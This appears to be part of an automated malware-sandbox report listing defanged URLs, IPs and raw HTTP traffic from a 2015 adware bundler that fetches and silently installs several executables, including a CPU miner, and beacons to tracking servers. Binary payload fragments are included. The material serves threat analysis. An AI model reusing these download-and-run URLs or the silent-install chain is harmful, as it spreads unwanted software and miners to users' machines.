hxxp://sstatic1.histats.com/0.gif?2948573&101&101 | 208.43.241.179 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332 | 54.231.1.180 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.10 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919 | 54.231.9.44 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.10 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178 | 54.231.1.180 |
hxxp://www.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe | 205.185.216.42 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565 | 54.231.1.180 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.10 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567 | 69.16.175.10 |
hxxp://sub.spirlymo.com/installers/bi_downloader/1443211351854/setup.exe | 54.239.168.25 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121 | 54.231.1.180 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572 | 54.231.1.180 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294 | 54.231.1.180 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.42 |
hxxp://www.downloadsoup.com/thankyou.php | 54.243.139.119 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657 | 54.231.1.180 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.146.34 |
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 188.165.230.78 |
hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.2/BiTool.dll | 54.239.168.66 |
s3.amazonaws.com | 54.231.2.168 |
upd.adskyforever.com | 37.187.147.141 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=47110
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop008.fr7.t,1443214693.cds005.fr7.c
......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: YLopITNBcjpN6ZNi8bUL6iTNRHGJ4dIu o9d5cWkUkgX4APfSBwwAM3iZbDUF2fy
x-amz-request-id: BAEF3C8F442293E7
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ET3xUecvZStOBGT3yC0wimpaKYLCNwjfv5qE4TLp96oWD/bz8SQ5jHt9DcKq8K1I
x-amz-request-id: 58036336FBC82E2B
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: zweZsynuCa4vHJ5gXggxq4M211jIyHQDTMCfxHSA5o9vGoU30SN YdFasTdILWLX
x-amz-request-id: C9044ADDEA476483
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 7cg95osLL5z4DfX2gGVw4E9A19i6of3RrseV4p1UfGOZPhyxLZIMoI7hetPOskIW
x-amz-request-id: ABBF092CEF73FE0F
Date: Fri, 25 Sep 2015 20:58:24 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ETbCIvuD8UjYE0xZeD0tbQHzvmuKHcVa0avWQ0T56VW5p06p73E3904tGnYjGMBl
x-amz-request-id: FA7EE3D5977531CE
Date: Fri, 25 Sep 2015 20:58:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: TAFU0CDeRM89pJ2JtvsNFoDgWSV3YFwvrv99YU7ezRhDkaT7GInjjZoCgDQjkSLi
x-amz-request-id: A0B545C5DC67D8D1
Date: Fri, 25 Sep 2015 20:58:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: /gpA3VzNSrpSvLvkktkMvMeuNYZGSFK93/duG1P8exqBeHlxzP2LPa6eUEIr7NiS
x-amz-request-id: D5ED956112D1659E
Date: Fri, 25 Sep 2015 20:58:39 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:01 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=F064099CEC1840E3A1022F24CE79668D; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F064099CEC1840E3A1022F24CE79668D,1443214741.14756; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 20:57:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.23
365..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..http://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..http://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..hXXp://www.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 20:57:58 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.23
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=CESwN2Es.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:47 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:47 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:48 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:09 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:23 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:33 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:44 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:44 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 200
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:54 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:00 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:10 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
